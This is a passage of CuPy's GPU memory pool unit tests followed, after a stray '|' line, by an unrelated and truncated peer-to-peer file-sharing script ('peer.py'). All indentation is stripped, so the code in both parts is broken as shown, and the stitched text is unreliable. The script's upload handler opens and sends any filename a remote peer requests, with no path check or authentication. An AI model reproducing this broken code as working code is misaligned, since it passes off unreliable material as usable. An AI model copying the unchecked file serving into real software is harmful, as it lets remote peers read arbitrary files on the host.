assert tail.ptr() == mem.ptr + self.unit * 2
assert tail.offset == self.unit * 2
assert tail.size == self.unit * 2
assert tail.prev.ptr() == chunk.ptr()
assert tail.next is None
assert tail.stream_ident == self.stream_ident
tail_of_head = chunk.split(self.unit)
assert chunk.ptr() == mem.ptr
assert chunk.offset == 0
assert chunk.size == self.unit
assert chunk.prev is None
assert chunk.next.ptr() == tail_of_head.ptr()
assert chunk.stream_ident == self.stream_ident
assert tail_of_head.ptr() == mem.ptr + self.unit
assert tail_of_head.offset == self.unit
assert tail_of_head.size == self.unit
assert tail_of_head.prev.ptr() == chunk.ptr()
assert tail_of_head.next.ptr() == tail.ptr()
assert tail_of_head.stream_ident == self.stream_ident
tail_of_tail = tail.split(self.unit)
assert tail.ptr() == chunk.ptr() + self.unit * 2
assert tail.offset == self.unit * 2
assert tail.size == self.unit
assert tail.prev.ptr() == tail_of_head.ptr()
assert tail.next.ptr() == tail_of_tail.ptr()
assert tail.stream_ident == self.stream_ident
assert tail_of_tail.ptr() == mem.ptr + self.unit * 3
assert tail_of_tail.offset == self.unit * 3
assert tail_of_tail.size == self.unit
assert tail_of_tail.prev.ptr() == tail.ptr()
assert tail_of_tail.next is None
assert tail_of_tail.stream_ident == self.stream_ident
def test_merge(self):
mem = MockMemory(self.unit * 4)
chunk = memory._Chunk(mem, 0, mem.size, self.stream_ident)
chunk_ptr = chunk.ptr()
chunk_offset = chunk.offset
chunk_size = chunk.size
tail = chunk.split(self.unit * 2)
head = chunk
head_ptr = head.ptr()
head_offset = head.offset
head_size = head.size
tail_ptr = tail.ptr()
tail_offset = tail.offset
tail_size = tail.size
tail_of_head = head.split(self.unit)
tail_of_tail = tail.split(self.unit)
head.merge(tail_of_head)
assert head.ptr() == head_ptr
assert head.offset == head_offset
assert head.size == head_size
assert head.prev is None
assert head.next.ptr() == tail_ptr
assert head.stream_ident == self.stream_ident
tail.merge(tail_of_tail)
assert tail.ptr() == tail_ptr
assert tail.offset == tail_offset
assert tail.size == tail_size
assert tail.prev.ptr() == head_ptr
assert tail.next is None
assert tail.stream_ident == self.stream_ident
head.merge(tail)
assert head.ptr() == chunk_ptr
assert head.offset == chunk_offset
assert head.size == chunk_size
assert head.prev is None
assert head.next is None
assert head.stream_ident == self.stream_ident
def test_alloc(self):
p1 = self.pool.malloc(self.unit * 4)
p2 = self.pool.malloc(self.unit * 4)
p3 = self.pool.malloc(self.unit * 8)
assert p1.ptr != p2.ptr
assert p1.ptr != p3.ptr
assert p2.ptr != p3.ptr
def test_alloc_split(self):
p = self.pool.malloc(self.unit * 4)
ptr = p.ptr
del p
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
assert ptr == head.ptr
assert ptr + self.unit * 2 == tail.ptr
def test_alloc_limit(self):
self.pool.set_limit(size=(self.unit * 6))
p1 = self.pool.malloc(self.unit * 5)
p2 = self.pool.malloc(self.unit * 1)
with self.assertRaises(memory.OutOfMemoryError):
self.pool.malloc(self.unit)
self.pool.set_limit(size=(self.unit * 7))
p3 = self.pool.malloc(self.unit)
del p1, p2, p3
def test_free(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
p2 = self.pool.malloc(self.unit * 4)
assert ptr1 == p2.ptr
def test_free_stream(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 4)
assert ptr1 != p2.ptr
def test_free_merge(self):
p = self.pool.malloc(self.unit * 4)
ptr = p.ptr
del p
# merge head into tail
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
assert ptr == head.ptr
del tail
del head
p = self.pool.malloc(self.unit * 4)
assert ptr == p.ptr
del p
# merge tail into head
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
assert ptr == head.ptr
del head
del tail
p = self.pool.malloc(self.unit * 4)
assert ptr == p.ptr
del p
def test_free_different_size(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
p2 = self.pool.malloc(self.unit * 8)
assert ptr1 != p2.ptr
def test_free_all_blocks(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
self.pool.free_all_blocks()
p2 = self.pool.malloc(self.unit * 4)
assert ptr1 != p2.ptr
del p2
def test_free_all_blocks_split(self):
# do not free split blocks
p = self.pool.malloc(self.unit * 4)
del p
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
tailptr = tail.ptr
del tail
self.pool.free_all_blocks()
p = self.pool.malloc(self.unit * 2)
assert tailptr == p.ptr
del head
def test_free_all_blocks_stream(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 4)
ptr2 = p2.ptr
del p2
self.pool.free_all_blocks(stream=stream_module.Stream.null)
p3 = self.pool.malloc(self.unit * 4)
assert ptr1 != p3.ptr
assert ptr2 != p3.ptr
with self.stream:
p4 = self.pool.malloc(self.unit * 4)
assert ptr1 != p4.ptr
assert ptr2 == p4.ptr
def test_free_all_blocks_all_streams(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 4)
ptr2 = p2.ptr
del p2
self.pool.free_all_blocks()
p3 = self.pool.malloc(self.unit * 4)
assert ptr1 != p3.ptr
assert ptr2 != p3.ptr
with self.stream:
p4 = self.pool.malloc(self.unit * 4)
assert ptr1 != p4.ptr
assert ptr2 != p4.ptr
def test_free_all_free(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with testing.assert_warns(DeprecationWarning):
self.pool.free_all_free()
p2 = self.pool.malloc(self.unit * 4)
assert ptr1 != p2.ptr
def test_used_bytes(self):
p1 = self.pool.malloc(self.unit * 2)
assert self.unit * 2 == self.pool.used_bytes()
p2 = self.pool.malloc(self.unit * 4)
assert self.unit * 6 == self.pool.used_bytes()
del p2
assert self.unit * 2 == self.pool.used_bytes()
del p1
assert self.unit * 0 == self.pool.used_bytes()
p3 = self.pool.malloc(self.unit * 1)
assert self.unit * 1 == self.pool.used_bytes()
del p3
def test_used_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
assert self.unit * 2 == self.pool.used_bytes()
del p2
def test_free_bytes(self):
p1 = self.pool.malloc(self.unit * 2)
assert self.unit * 0 == self.pool.free_bytes()
p2 = self.pool.malloc(self.unit * 4)
assert self.unit * 0 == self.pool.free_bytes()
del p2
assert self.unit * 4 == self.pool.free_bytes()
del p1
assert self.unit * 6 == self.pool.free_bytes()
p3 = self.pool.malloc(self.unit * 1)
assert self.unit * 5 == self.pool.free_bytes()
del p3
def test_free_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
assert self.unit * 4 == self.pool.free_bytes()
del p2
def test_total_bytes(self):
p1 = self.pool.malloc(self.unit * 2)
assert self.unit * 2 == self.pool.total_bytes()
p2 = self.pool.malloc(self.unit * 4)
assert self.unit * 6 == self.pool.total_bytes()
del p1
assert self.unit * 6 == self.pool.total_bytes()
del p2
assert self.unit * 6 == self.pool.total_bytes()
p3 = self.pool.malloc(self.unit * 1)
assert self.unit * 6 == self.pool.total_bytes()
assert (self.pool.used_bytes() + self.pool.free_bytes()
== self.pool.total_bytes())
del p3
self.pool.free_all_blocks()
assert 0 == self.pool.total_bytes()
def test_total_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
assert self.unit * 6 == self.pool.total_bytes()
del p2
def test_get_limit(self):
# limit is disabled by default
assert 0 == self.pool.get_limit()
def test_set_limit_size(self):
self.pool.set_limit(size=1024)
assert 1024 == self.pool.get_limit()
self.pool.set_limit(size=2**33)
assert 2**33 == self.pool.get_limit()
self.pool.set_limit(size=0)
assert 0 == self.pool.get_limit()
with self.assertRaises(ValueError):
self.pool.set_limit(size=-1)
def test_set_limit_fraction(self):
_, total = cupy.cuda.runtime.memGetInfo()
self.pool.set_limit(fraction=0)
assert 0 == self.pool.get_limit()
self.pool.set_limit(fraction=0.5)
assert total * 0.5 == self.pool.get_limit()
self.pool.set_limit(fraction=1.0)
assert total == self.pool.get_limit()
with self.assertRaises(ValueError):
self.pool.set_limit(fraction=-1)
with self.assertRaises(ValueError):
self.pool.set_limit(fraction=1.1)
class TestParseMempoolLimitEnvVar(unittest.TestCase):
def test_parse_limit_string(self):
parse_limit_string = memory._parse_limit_string
# size
param = parse_limit_string('0')
assert 0 == param['size']
assert None is param['fraction']
param = parse_limit_string('1073741824')
assert 1073741824 == param['size']
assert None is param['fraction']
# fraction
param = parse_limit_string('0%')
assert None is param['size']
assert 0.0 == param['fraction']
param = parse_limit_string('40%')
assert None is param['size']
assert 0.4 == param['fraction']
param = parse_limit_string('70.5%')
assert None is param['size']
assert 0.705 == param['fraction']
param = parse_limit_string('100%')
assert None is param['size']
assert 1.0 == param['fraction']
@testing.parameterize(*testing.product({
'allocator': [memory._malloc, memory.malloc_managed],
}))
@testing.gpu
class TestMemoryPool(unittest.TestCase):
def setUp(self):
if (cupy.cuda.runtime.is_hip
and self.allocator is memory.malloc_managed):
raise unittest.SkipTest('HIP does not support managed memory')
self.pool = memory.MemoryPool(self.allocator)
def tearDown(self):
self.pool.free_all_blocks()
def test_zero_size_alloc(self):
with cupy.cuda.Device():
mem = self.pool.malloc(0).mem
assert isinstance(mem, memory.Memory)
assert not isinstance(mem, memory.PooledMemory)
def test_double_free(self):
with cupy.cuda.Device():
mem = self.pool.malloc(1).mem
mem.free()
mem.free()
def test_free_all_blocks(self):
with cupy.cuda.Device():
mem = self.pool.malloc(1).mem
assert isinstance(mem, memory.BaseMemory)
assert isinstance(mem, memory.PooledMemory)
assert self.pool.n_free_blocks() == 0
mem.free()
assert self.pool.n_free_blocks() == 1
self.pool.free_all_blocks()
assert self.pool.n_free_blocks() == 0
def test_free_all_blocks_without_malloc(self):
with cupy.cuda.Device():
# call directly without malloc.
self.pool.free_all_blocks()
assert self.pool.n_free_blocks() == 0
def test_free_all_free(self):
with cupy.cuda.Device():
mem = self.pool.malloc(1).mem
assert isinstance(mem, memory.BaseMemory)
assert isinstance(mem, memory.PooledMemory)
assert self.pool.n_free_blocks() == 0
mem.free()
assert self.pool.n_free_blocks() == 1
with testing.assert_warns(DeprecationWarning):
self.pool.free_all_free()
assert self.pool.n_free_blocks() == 0
def test_free_all_free_without_malloc(self):
with cupy.cuda.Device():
# call directly without malloc.
with testing.assert_warns(DeprecationWarning):
self.pool.free_all_free()
assert self.pool.n_free_blocks() == 0
def test_n_free_blocks_without_malloc(self):
with cupy.cuda.Device():
# call directly without malloc/free_all_free.
assert self.pool.n_free_blocks() == 0
def test_used_bytes(self):
with cupy.cuda.Device():
assert 0 == self.pool.used_bytes()
def test_free_bytes(self):
with cupy.cuda.Device():
assert 0 == self.pool.free_bytes()
def test_total_bytes(self):
with cupy.cuda.Device():
assert 0 == self.pool.total_bytes()
# TODO(leofang): test MemoryAsyncPool. We currently remove the test because
# this test class requires the ability of creating a new pool, which we do
# not support yet for MemoryAsyncPool.
@testing.parameterize(*testing.product({
'mempool': ('MemoryPool',),
}))
@testing.gpu
class TestAllocator(unittest.TestCase):
def setUp(self):
if self.mempool == 'MemoryAsyncPool':
if cupy.cuda.runtime.is_hip:
pytest.skip('HIP does not support async allocator')
if cupy.cuda.driver.get_build_version() < 11020:
pytest.skip('malloc_async is supported since CUDA 11.2')
if cupy.cuda.runtime.driverGetVersion() < 11030:
pytest.skip('pool statistics is supported with driver 11.3+')
self.old_pool = cupy.get_default_memory_pool()
self.pool = getattr(memory, self.mempool)()
memory.set_allocator(self.pool.malloc)
def tearDown(self):
self.pool.set_limit(size=0)
self.pool.free_all_blocks()
memory.set_allocator(self.old_pool.malloc)
def test_set_allocator(self):
with cupy.cuda.Device():
assert 0 == self.pool.used_bytes()
arr = cupy.arange(128, dtype=cupy.int64)
assert 1024 == arr.data.mem.size
assert 1024 == self.pool.used_bytes()
def test_get_allocator(self):
assert memory.get_allocator() == self.pool.malloc
def test_allocator_context_manager(self):
new_pool = memory.MemoryPool()
with cupy.cuda.using_allocator(new_pool.malloc):
assert memory.get_allocator() == new_pool.malloc
assert memory.get_allocator() == self.pool.malloc
def test_set_allocator_cm(self):
new_pool = memory.MemoryPool()
new_pool2 = memory.MemoryPool()
with cupy.cuda.using_allocator(new_pool.malloc):
with self.assertRaises(ValueError):
memory.set_allocator(new_pool2.malloc)
def test_allocator_nested_context_manager(self):
new_pool = memory.MemoryPool()
with cupy.cuda.using_allocator(new_pool.malloc):
new_pool2 = memory.MemoryPool()
assert memory.get_allocator() == new_pool.malloc
with cupy.cuda.using_allocator(new_pool2.malloc):
assert memory.get_allocator() == new_pool2.malloc
assert memory.get_allocator() == new_pool.malloc
assert memory.get_allocator() == self.pool.malloc
def test_allocator_thread_local(self):
barrier = threading.Barrier(2)
def thread_body(self):
cupy.cuda.Device().use()
new_pool = memory.MemoryPool()
with cupy.cuda.using_allocator(new_pool.malloc):
assert memory.get_allocator() == new_pool.malloc
barrier.wait()
arr = cupy.zeros(128, dtype=cupy.int64)
barrier.wait()
assert arr.data.mem.size == new_pool.used_bytes()
barrier.wait()
assert memory.get_allocator() == self.pool.malloc
self._success = True
with cupy.cuda.Device():
self._success = False
t = threading.Thread(target=thread_body, args=(self,), daemon=True)
t.start()
barrier.wait()
assert memory.get_allocator() == self.pool.malloc
arr = cupy.ones(256, dtype=cupy.int64)
barrier.wait()
assert arr.data.mem.size == self.pool.used_bytes()
barrier.wait()
t.join()
assert self._success
def test_thread_local_valid(self):
new_pool = memory.MemoryPool()
arr = None
with cupy.cuda.using_allocator(new_pool.malloc):
arr = cupy.zeros(128, dtype=cupy.int64)
arr += 1
# Check that arr and the pool have not been released
assert arr.data.mem.size == new_pool.used_bytes()
assert arr.sum() == 128
def _reuse_between_thread(self, stream_main, stream_sub):
new_pool = memory.MemoryPool()
def job(stream):
cupy.cuda.Device().use()
with cupy.cuda.using_allocator(new_pool.malloc):
with stream:
arr = cupy.arange(16)
self._ptr = arr.data.ptr
del arr
self._error = False
# Run in main thread.
self._ptr = -1
self._error = True
job(stream_main)
assert not self._error
main_ptr = self._ptr
# Run in sub thread.
self._ptr = -1
self._error = True
with cupy.cuda.Device():
t = threading.Thread(target=job, args=(stream_sub,))
t.daemon = True
t.start()
t.join()
assert not self._error
return main_ptr, self._ptr
def test_reuse_between_thread(self):
stream = cupy.cuda.Stream.null
main_ptr, sub_ptr = self._reuse_between_thread(stream, stream)
assert main_ptr == sub_ptr
def test_reuse_between_thread_same_stream(self):
stream = cupy.cuda.Stream()
main_ptr, sub_ptr = self._reuse_between_thread(stream, stream)
assert main_ptr == sub_ptr
def test_reuse_between_thread_different_stream(self):
stream1 = cupy.cuda.Stream()
stream2 = cupy.cuda.Stream()
main_ptr, sub_ptr = self._reuse_between_thread(stream1, stream2)
assert main_ptr != sub_ptr
@pytest.mark.skipif(cupy.cuda.runtime.is_hip, reason='No PTDS on HIP')
def test_reuse_between_thread_ptds(self):
stream = cupy.cuda.Stream.ptds
main_ptr, sub_ptr = self._reuse_between_thread(stream, stream)
assert main_ptr != sub_ptr
@testing.gpu
class TestAllocatorDisabled(unittest.TestCase):
def setUp(self):
self.pool = cupy.get_default_memory_pool()
def tearDown(self):
memory.set_allocator(self.pool.malloc)
def _check_pool_not_used(self):
used_bytes = self.pool.used_bytes()
with cupy.cuda.Device():
arr = cupy.arange(128, dtype=cupy.int64)
assert 0 == self.pool.used_bytes() - used_bytes
del arr
def test(self):
memory.set_allocator()
self._check_pool_not_used()
def test_none(self):
memory.set_allocator(None)
self._check_pool_not_used()
class PythonAllocator(object):
def __init__(self):
self.malloc_called = False
self.free_called = False
def malloc(self, size, device_id):
self.malloc_called = True
return cupy.cuda.runtime.malloc(size)
def free(self, size, device_id):
self.free_called = True
cupy.cuda.runtime.free(size)
@testing.gpu
class TestPythonFunctionAllocator(unittest.TestCase):
def setUp(self):
self.old_pool = cupy.get_default_memory_pool()
self.alloc = PythonAllocator()
python_alloc = memory.PythonFunctionAllocator(
self.alloc.malloc, self.alloc.free)
memory.set_allocator(python_alloc.malloc)
def tearDown(self):
memory.set_allocator(self.old_pool.malloc)
def test_allocator(self):
assert not self.alloc.malloc_called and not self.alloc.free_called
cupy.zeros(10)
assert self.alloc.malloc_called and self.alloc.free_called
@testing.gpu
class TestMemInfo(unittest.TestCase):
def test_mem_info(self):
d = cupy.cuda.Device()
mem_info = d.mem_info
assert isinstance(mem_info, tuple)
assert len(mem_info) == 2
assert all(isinstance(m, int) for m in mem_info)
assert all(m > 0 for m in mem_info)
@testing.gpu
class TestLockAndNoGc(unittest.TestCase):
def test(self):
lock = fastrlock.rlock.FastRLock()
ctx = memory.LockAndNoGc(lock)
assert gc.isenabled()
self.assertRaises(Exception, lock.release)
with ctx:
assert not gc.isenabled()
lock.release()
lock.acquire()
assert gc.isenabled()
self.assertRaises(Exception, lock.release)
class TestExceptionPicklable(unittest.TestCase):
def test(self):
e1 = memory.OutOfMemoryError(124, 1024, 1024)
e2 = pickle.loads(pickle.dumps(e1))
assert e1.args == e2.args
assert str(e1) == str(e2)
@testing.gpu
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='HIP does not support async allocator')
@pytest.mark.skipif(cupy.cuda.driver.get_build_version() < 11020,
reason='malloc_async is supported since CUDA 11.2')
class TestMallocAsync(unittest.TestCase):
def setUp(self):
self.old_pool = cupy.get_default_memory_pool()
memory.set_allocator(memory.malloc_async)
def tearDown(self):
memory.set_allocator(self.old_pool.malloc)
def _check_pool_not_used(self):
used_bytes = self.old_pool.used_bytes()
with cupy.cuda.Device():
arr = cupy.arange(128, dtype=cupy.int64)
assert 0 == self.old_pool.used_bytes() - used_bytes
del arr
def test(self):
self._check_pool_not_used()
def test_stream1(self):
# Check: pool is not used when on a stream
s = cupy.cuda.Stream()
with s:
self._check_pool_not_used()
def test_stream2(self):
# Check: the memory was allocated on the right stream
s = cupy.cuda.Stream()
with s:
memptr = memory.alloc(100)
assert memptr.mem.stream_ref().ptr == s.ptr
def test_stream3(self):
# Check: destroying the stream does not affect memory deallocation
s = cupy.cuda.Stream()
with s:
memptr = memory.alloc(100)
del s
gc.collect()
del memptr
def test_stream4(self):
# Check: free on the same stream
s = cupy.cuda.Stream()
with s:
memptr = memory.alloc(100)
del memptr
def test_stream5(self):
# Check: free on another stream
s1 = cupy.cuda.Stream()
with s1:
memptr = memory.alloc(100)
del s1
s2 = cupy.cuda.Stream()
with s2:
del memptr
@testing.gpu
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='HIP does not support async allocator')
@pytest.mark.skipif(cupy.cuda.driver.get_build_version() < 11020,
reason='malloc_async is supported since CUDA 11.2')
class TestMemoryAsyncPool(unittest.TestCase):
def setUp(self):
self.pool = memory.MemoryAsyncPool()
self.unit = memory._allocation_unit_size
self.stream = stream_module.Stream()
self.stream_ident = self.stream.ptr
cupy.get_default_memory_pool().free_all_blocks()
cupy.cuda.Device().synchronize()
def tearDown(self):
self.pool.set_limit(size=0)
self.pool.free_all_blocks()
def test_zero_size_alloc(self):
with cupy.cuda.Device():
mem = self.pool.malloc(0).mem
assert isinstance(mem, memory.MemoryAsync)
assert not isinstance(mem, memory.PooledMemory)
def test_alloc(self):
with cupy.cuda.Device():
mem = self.pool.malloc(100).mem
assert isinstance(mem, memory.MemoryAsync)
assert not isinstance(mem, memory.PooledMemory)
@testing.slow
def test_alloc_large_chunk(self):
self.pool.free_all_blocks()
with cupy.cuda.Device() as d:
_, mem_total = d.mem_info
mem = self.pool.malloc(int(0.7 * mem_total)).mem # 70% memory
del mem
mem = self.pool.malloc(int(0.3 * mem_total)).mem # 30% memory # noqa
def test_free_all_blocks(self):
with cupy.cuda.Device():
mem = self.pool.malloc(1).mem
del mem
self.pool.free_all_blocks()
@testing.slow
def test_free_all_blocks_large_chunk(self):
# When memory is returned to the async mempool, it is not immediately
# visible to normal malloc routines until after a sync happens.
default_pool = cupy.get_default_memory_pool()
with cupy.cuda.Device() as d:
_, mem_total = d.mem_info
mem = self.pool.malloc(int(0.7 * mem_total)).mem # 70% memory
del mem
with pytest.raises(memory.OutOfMemoryError):
default_pool.malloc(int(0.3 * mem_total)) # 30% memory
self.pool.free_all_blocks() # synchronize
default_pool.malloc(int(0.3 * mem_total)) # this time it'd work
@testing.slow
def test_interaction_with_CuPy_default_pool(self):
# Test saneness of cudaMallocAsync
default_pool = cupy.get_default_memory_pool()
with cupy.cuda.Device() as d:
_, mem_total = d.mem_info
mem = default_pool.malloc(int(0.7 * mem_total)).mem # 70% memory
del mem
with pytest.raises(memory.OutOfMemoryError):
self.pool.malloc(int(0.3 * mem_total)) # 30% memory
default_pool.free_all_blocks()
self.pool.malloc(int(0.3 * mem_total)) # this time it'd work
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='used_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_used_bytes(self):
with cupy.cuda.Device():
assert 0 == self.pool.used_bytes()
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='used_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_used_bytes2(self):
p1 = self.pool.malloc(self.unit * 2)
assert self.unit * 2 == self.pool.used_bytes()
p2 = self.pool.malloc(self.unit * 4)
assert self.unit * 6 == self.pool.used_bytes()
del p2
assert self.unit * 2 == self.pool.used_bytes()
del p1
assert self.unit * 0 == self.pool.used_bytes()
p3 = self.pool.malloc(self.unit * 1)
assert self.unit * 1 == self.pool.used_bytes()
del p3
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='used_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_used_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
assert self.unit * 2 == self.pool.used_bytes()
del p2
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='free_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_free_bytes(self):
with cupy.cuda.Device():
assert 0 == self.pool.free_bytes()
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='free_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_free_bytes2(self):
# Note: MemoryAsyncPool works differently from MemoryPool. The first
# allocation would be much bigger than requested, and the pool size
# increases as needed. As a result, this test method is very different
# from TestSingleDeviceMemoryPool.test_free_bytes(), in that the pool
# size is a fixed value (outside of our control).
p1 = self.pool.malloc(self.unit * 2)
assert self.pool.free_bytes() == (
self.pool.total_bytes() - self.pool.used_bytes()) # always true
# current_size is fixed throughout this test, as no synchronization
# (such as free_all_blocks()) is done
current_size = self.pool.total_bytes()
free_size = self.pool.free_bytes()
p2 = self.pool.malloc(self.unit * 4)
free_size -= self.unit * 4
assert self.pool.free_bytes() == free_size
del p2
free_size += self.unit * 4
assert self.pool.free_bytes() == free_size
del p1
free_size += self.unit * 2
assert self.pool.free_bytes() == free_size
p3 = self.pool.malloc(self.unit * 1)
free_size -= self.unit * 1
assert self.pool.free_bytes() == free_size
del p3
assert self.pool.total_bytes() == current_size
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='free_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_free_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
assert self.pool.free_bytes() == (
self.pool.total_bytes() - self.pool.used_bytes()) # always true
del p2
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='total_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_total_bytes(self):
with cupy.cuda.Device():
assert 0 == self.pool.total_bytes()
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='total_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_total_bytes2(self):
# Note: MemoryAsyncPool works differently from MemoryPool. The first
# allocation would be much bigger than requested, and the pool size
# increases as needed. As a result, this test method is very different
# from TestSingleDeviceMemoryPool.test_total_bytes(), in that the pool
# size is either 0 or a fixed value (outside of our control).
p1 = self.pool.malloc(self.unit * 2)
current_size = self.pool.total_bytes()
assert current_size == self.pool.total_bytes()
p2 = self.pool.malloc(self.unit * 4)
assert current_size == self.pool.total_bytes()
del p1
assert current_size == self.pool.total_bytes()
del p2
assert current_size == self.pool.total_bytes()
self.pool.free_all_blocks()
assert 0 == self.pool.total_bytes()
p3 = self.pool.malloc(self.unit * 1)
assert current_size == self.pool.total_bytes()
assert (self.pool.used_bytes() + self.pool.free_bytes()
== self.pool.total_bytes())
del p3
self.pool.free_all_blocks()
assert 0 == self.pool.total_bytes()
@pytest.mark.skipif(cupy.cuda.runtime.driverGetVersion() < 11030,
reason='total_bytes is supported with driver 11.3+')
@pytest.mark.skip(reason='unstable, see #5349')
def test_total_bytes_stream(self):
# Note: MemoryAsyncPool works differently from MemoryPool. The first
# allocation would be much bigger than requested, and the pool size
# increases as needed. As a result, this test method is very different
# from TestSingleDeviceMemoryPool.test_total_bytes_stream(), in that
# the pool size is either 0 or a fixed value (outside of our control).
p1 = self.pool.malloc(self.unit * 4)
current_size = self.pool.total_bytes()
assert current_size > 0
del p1
assert current_size > 0
self.pool.free_all_blocks()
assert 0 == self.pool.total_bytes()
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
assert current_size == self.pool.total_bytes()
del p2
def test_get_limit(self):
# limit is disabled by default
assert 2**64-1 == self.pool.get_limit()
def test_set_limit_size(self):
self.pool.set_limit(size=1024)
assert 1024 == self.pool.get_limit()
self.pool.set_limit(size=2**33)
assert 2**33 == self.pool.get_limit()
self.pool.set_limit(size=0)
assert 2**64-1 == self.pool.get_limit()
with self.assertRaises(ValueError):
self.pool.set_limit(size=-1)
def test_set_limit_fraction(self):
_, total = cupy.cuda.runtime.memGetInfo()
self.pool.set_limit(fraction=0)
assert 2**64-1 == self.pool.get_limit()
self.pool.set_limit(fraction=0.5)
assert total * 0.5 == self.pool.get_limit()
self.pool.set_limit(fraction=1.0)
assert total == self.pool.get_limit()
with self.assertRaises(ValueError):
self.pool.set_limit(fraction=-1)
with self.assertRaises(ValueError):
self.pool.set_limit(fraction=1.1)
|
peer.py
|
import os
import sys
import socket
import threading
import json
import time
import click
from watchdog.observers import Observer
from watchdog.events import PatternMatchingEventHandler
FORMAT = "utf-8"
SIZE = 1024
def watchFolder(conn):
# Keep watching the folder for any change
patterns = ["*"]
ignore_patterns = []
ignore_directories = False
case_sensitive = True
event_handler = PatternMatchingEventHandler(patterns, ignore_patterns, ignore_directories, case_sensitive)
def on_change(event):
# Update the file list with the indexing server
files = os.listdir("./")
register_data = {
"action": "UPDATE",
"filelist": files
}
register_json = json.dumps(register_data)
conn.send(register_json.encode(FORMAT))
event_handler.on_created = on_change
event_handler.on_deleted = on_change
path = "."
go_recursively = True
folder_observer = Observer()
folder_observer.schedule(event_handler, path, recursive=go_recursively)
folder_observer.start()
def downloadFile(addr, filename):
# Download file from other peer
print(f"[DOWNLOADING] Downloading {filename} from {addr}")
downloader = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
downloader.connect(addr)
downloader.send(json.dumps({"file": filename}).encode(FORMAT))
l = downloader.recv(1024)
f = open(filename,'wb') #open in binary
while (l):
f.write(l)
l = downloader.recv(1024)
f.close()
downloader.close()
def uploadHandler(conn, addr):
full_addr = addr[0] + ":" + str(addr[1])
data = conn.recv(SIZE).decode(FORMAT)
json_data = json.loads(data)
filename = json_data["file"]
print(f"[UPLOADING] {full_addr} is downloading {filename}")
f = open (filename, "rb")
l = f.read(SIZE)
while (l):
conn.send(l)
l = f.read(SIZE)
conn.close()
def peerServer(peer_server_addr):
print("[STARTING] Peer Server is starting")
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(peer_server_addr)
server.listen()
print(f"[LISTENING] Peer Server is listening on {peer_server_addr[0]}:{str(peer_server_addr[1])}")
while True:
conn, addr = server.accept()
thread = threading.Thread(target=uploadHandler, args=(conn, addr))
thread.start()
def connectIndexingServer(client_bind_addr, server_addr):
conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn.bind(client_bind_addr)
try:
conn.connect(server_addr)
except:
print("[ERROR] Cannot connect to indexing server")
try:
sys.exit(0)
except SystemExit:
os._exit(0)
peer_server_addr = (client_bind_addr[0], client_bind_addr[1] + 1)
thread = threading.Thread(target=peerServer, args=(peer_server_addr,))
thread.daemon = True
thread.start()
files = os.listdir("./")
register_data = {
"action": "REGISTER",
"filelist": files
}
register_json = json.dumps(register_data)
conn.send(register_json.encode(FORMAT))
thread = threading.Thread(target=watchFolder, args=(conn,))
thread.daemon = True
thread.start()
isvalid = True
while True:
if isvalid:
data = conn.recv(SIZE).decode(FORMAT)
if not data:
print("[ERROR] Disconnect from indexing server")
break
json_data = json.loads(data)
if json_data["type"] == "OK":
print(json_data["msg"])
elif json_data["type"] == "QUERY-RES":
query_file = json_data["file"]
peer_list = json_data["msg"]
if len(peer_list) > 0:
while True:
for i, peer in enumerate(peer_list):
print(str(i+1) + ") " + peer)
print("0) exit")
print("Choose a peer to download:")
user_input = input("> ").strip()
if user_input.isnumeric():
    i = int(user_input)
